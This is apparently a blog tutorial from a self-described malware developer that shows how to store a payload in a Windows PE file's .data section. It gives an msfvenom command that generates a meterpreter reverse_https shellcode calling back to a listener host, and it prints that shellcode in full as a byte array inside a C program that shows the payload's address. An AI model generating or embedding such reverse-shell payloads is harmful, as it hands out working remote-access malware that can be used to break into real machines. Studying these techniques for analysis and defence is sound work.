In the Portable Executable file structure (PE) we malware developers have a some options to where to store there payload
First let’s Generate the payload from Msfvenom
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\\x00"
Now Let’s write a C Code that will store the Malicious payload in the .data secretion in the PE Structure
#include <stdio.h>
#include <Windows.h>
// Hello I'm the payload nice to meet you!
// I'm stored at the Data Section Here!
// msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\\x00"
unsigned char shellcode[] =
"\\xb8\\xc9\\xe3\\x83\\xe1\\xdb\\xcc\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9"
"\\xb1\\x8a\\x83\\xc2\\x04\\x31\\x42\\x10\\x03\\x42\\x10\\x2b\\x16\\x7f"
"\\x09\\x24\\xd9\\x80\\xca\\x5a\\xeb\\x52\\x43\\x7f\\x6f\\xd8\\x06\\x4f"
"\\xfb\\x8c\\xaa\\x24\\xa9\\x24\\xbc\\x8d\\x04\\x63\\xf3\\x0e\\x13\\x19"
"\\xdb\\xc1\\xe4\\x72\\x27\\x40\\x99\\x88\\x74\\xa2\\xa0\\x42\\x89\\xa3"
"\\xe5\\x14\\xe7\\x4c\\xbb\\x2d\\x55\\x82\\xb7\\x70\\x66\\xa3\\x17\\xff"
"\\xd6\\xdb\\x12\\xc0\\x80\\x6f\\x51\\xc0\\xfe\\x04\\x31\\xe2\\xff\\xc9"
"\\x49\\xaa\\xe7\\xbd\\xc8\\xe2\\x6c\\x01\\xe2\\x0b\\xc5\\xf2\\x30\\x7f"
"\\xd7\\xd2\\x08\\xbf\\x19\\x15\\x67\\x93\\x9b\\x6e\\x40\\x0b\\xee\\x84"
"\\xb2\\xb6\\xe9\\x5f\\xc8\\x6c\\x7f\\x7f\\x6a\\xe6\\x27\\x5b\\x8a\\x2b"
"\\xb1\\x28\\x80\\x80\\xb5\\x76\\x85\\x17\\x19\\x0d\\xb1\\x9c\\x9c\\xc1"
"\\x33\\xe6\\xba\\xc5\\x18\\xbc\\xa3\\x5c\\xc5\\x13\\xdb\\xbe\\xa1\\xcc"
"\\x79\\xb5\\x40\\x1a\\xfd\\x36\\x9b\\x23\\xa3\\xa0\\x0a\\xb9\\x28\\x30"
"\\xbb\\x36\\xb8\\x5e\\x52\\xed\\x52\\xd2\\xd3\\x2b\\xa4\\x15\\xce\\x05"
"\\x71\\xba\\xa2\\x36\\xd6\\x6f\\xad\\xca\\xd8\\x8f\\x2d\\x60\\xb6\\xf5"
"\\x44\\x16\\x24\\x68\\xb8\\xd3\\x9a\\x5a\\xe6\\x33\\xae\\xfb\\x85\\x2a"
"\\x5e\\x8f\\x26\\xde\\xf6\\x54\\x99\\x69\\x69\\xde\\xbc\\x05\\x55\\x53"
"\\x5e\\xb5\\xb5\\x24\\xf3\\x19\\xee\\x9a\\xc2\\x6a\\x51\\xeb\\x0d\\xad"
"\\x2c\\x7b\\x3e\\xc1\\xcb\\x2c\\xdb\\x7b\\x5f\\xbb\\x57\\x53\\x69\\x0b"
"\\xad\\x85\\xa4\\x45\\xfc\\xec\\xe6\\xb1\\xb5\\x46\\xb3\\x8c\\x05\\x7b"
"\\x1b\\x62\\xff\\xe8\\x3e\\x5a\\xb8\\x8b\\xa3\\xf1\\x29\\x7d\\x04\\x53"
"\\xd3\\x0f\\x37\\x32\\x74\\x9e\\x98\\xf5\\xbc\\x70\\xd6\\xd5\\x93\\xed"
"\\x7e\\x74\\x66\\x87\\x51\\x40\\xb6\\x62\\x80\\x9d\\x98\\xbd\\xe9\\xdd"
"\\x8c\\x87\\x47\\xa4\\xeb\\x07\\xb2\\x05\\xa7\\x9d\\x3e\\xfa\\x14\\x0a"
"\\xfa\\xfd\\x9a\\xca\\x14\\x36\\x9a\\xca\\xe4\\xe7\\xee\\xae\\xa7\\x8d"
"\\x4f\\x4c\\x44\\x06\\x40\\xa2\\xd1\\x8c\\xcc\\x80\\xa0\\x1a\\x68\\x36"
"\\x04\\xc3\\x43\\x5f\\xd3\\x47\\x9c\\xf5\\x6b\\x2e\\x94\\x67\\x38\\xd6"
"\\x69\\x2e\\xa7\\x57\\x33\\x94\\x6b\\x0d\\xda\\x70\\x3a\\xe5\\x2a\\xb2"
"\\x88\\x7c\\x2b\\xf1\\x6b\\x24\\x8a\\xb6\\x30\\xe0\\x55\\x7f\\xb7\\x40"
"\\x0e\\x28\\x3e\\xff\\x08\\x29\\x95\\x76\\x52\\x85\\x7e\\x88\\x69\\xc2"
"\\xfb\\xdb\\xde\\x41\\x53\\x88\\xb6\\x0d\\xb0\\x7b\\x19\\xf5\\xb9\\x56"
"\\xf3\\x63\\x4c\\x07\\x94\\xf3\\x63\\xb7\\x64\\x7d\\x63\\xdd\\x60\\x2d"
"\\x0e\\x3e\\x3f\\xa5\\xbb\\x06\\x21\\xb3\\xbb\\x53\\x0e\\xef\\x10\\x08"
"\\xe7\\x67\\xba\\xa8\\x1f\\x03\\x3b\\x61\\x9a\\x33\\xb6\\x9d\\xcd\\x3b"
"\\x2a\\x9d\\x0d\\x54\\x09\\x6d\\x38\\x44\\x6e\\x58\\x0c\\xf1\\x5c\\x8a"
"\\xda\\xf9\\x5e\\x4a\\xb7\\xb9\\x36\\x4a\\x57\\x3a\\xc7\\x22\\x57\\x3a"
"\\x87\\xb2\\x04\\x52\\x5f\\x16\\xf9\\x47\\xa0\\x83\\x6d\\xd4\\x0c\\xa2"
"\\x75\\x8c\\xda\\xb4\\x59\\x33\\x1b\\xe7\\xcf\\x5b\\x09\\x91\\x79\\x79"
"\\xd2\\x48\\xfc\\xbe\\x59\\xbd\\x74\\x39\\xa3\\x82\\x0e\\x86\\xd6\\xe1"
"\\x49\\xc4\\x46\\x01\\x02\\x35\\x87\\x2e\\xe4\\xf0\\x4a\\xfe\\x36\\x35"
"\\x93\\xd0\\x09\\x17\\xd2\\x1e\\x6a\\xdc\\xe4\\xeb\\xc8\\x74\\x6f\\x13"
"\\x5e\\x86\\xba";
int main()
{
printf("Rem01x Malware Development Journey\\n");
printf("Hello I'm the Paylaod my address is: 0x%p", shellcode);
return EXIT_SUCCESS;
}
Now let’s compile the code and open it in the PE-Bear to have a look at the .data Section
